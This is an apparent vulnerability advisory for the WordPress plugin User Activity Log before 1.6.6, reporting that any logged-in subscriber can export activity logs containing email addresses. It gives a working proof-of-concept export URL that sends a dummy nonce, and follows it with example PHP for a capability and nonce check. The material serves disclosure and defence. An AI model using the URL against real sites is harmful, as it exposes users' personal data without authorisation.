wpexploit | Daniel Ruf | WPEX-ID: DB3E4336-117C-47F2-9B43-2CA115525297
History: Aug 09, 2023 - 12:00 a.m.

User Activity Log < 1.6.6 - Subscriber+ Log Export

Tags: subscriber, url, export, log, security exploit

AI Score: 4.7 Medium (Confidence: High)

EPSS: 0.0004 Low (Percentile: 14.0%)

Description: The plugin lacks proper authorisation when exporting its activity logs, allowing any authenticated user, such as a subscriber, to perform the export and retrieve PII such as email addresses.

As a subscriber, open the following URL:

https://example.com/wp-admin/admin-post.php?page=user_action_log&export=user_logs&logformat=csv&userrole&dateshow&username&type&showip&txtsearch&export-nonce=aaa
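As an added example (not the plugin's own code), this is the shape of the capability and nonce check that an export handler like the one above needs; the hook, nonce action, capability and helper names are assumptions, since the plugin's real implementation is not shown here:

```php
<?php
// Added example, not the plugin's code: a hardened handler for a log-export
// request matching the PoC URL (page=user_action_log&export=user_logs).
// Hook, nonce action, required capability and helper names are assumptions.

add_action( 'admin_init', 'hypothetical_ual_handle_export' );

function hypothetical_ual_handle_export() {
    // Only react to the export request; every other admin request falls through.
    if ( ! isset( $_GET['page'], $_GET['export'] )
        || 'user_action_log' !== $_GET['page']
        || 'user_logs' !== $_GET['export'] ) {
        return;
    }

    // Authorisation: the check the advisory says is missing. A subscriber
    // lacks manage_options, so the request stops here with a 403.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'You are not allowed to export activity logs.' ), '', array( 'response' => 403 ) );
    }

    // CSRF: verify the nonce instead of accepting any value (the PoC sends "aaa").
    // check_admin_referer() terminates with an error page if the nonce is invalid.
    check_admin_referer( 'ual_export_user_logs', 'export-nonce' );

    // Validate the requested format against an allow-list before building the file.
    $format = isset( $_GET['logformat'] ) ? sanitize_key( $_GET['logformat'] ) : 'csv';
    if ( ! in_array( $format, array( 'csv' ), true ) ) {
        wp_die( esc_html__( 'Unsupported export format.' ), '', array( 'response' => 400 ) );
    }

    hypothetical_ual_stream_export( $format );
}

// Assumed helper: only reached after both checks above have passed.
function hypothetical_ual_stream_export( $format ) {
    header( 'Content-Type: text/csv; charset=utf-8' );
    header( 'Content-Disposition: attachment; filename="user-logs.csv"' );
    $out = fopen( 'php://output', 'w' );
    // Rows would come from the plugin's log table (not shown on this page);
    // only the header row is emitted here.
    fputcsv( $out, array( 'user', 'action', 'time' ) );
    fclose( $out );
    exit;
}
```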
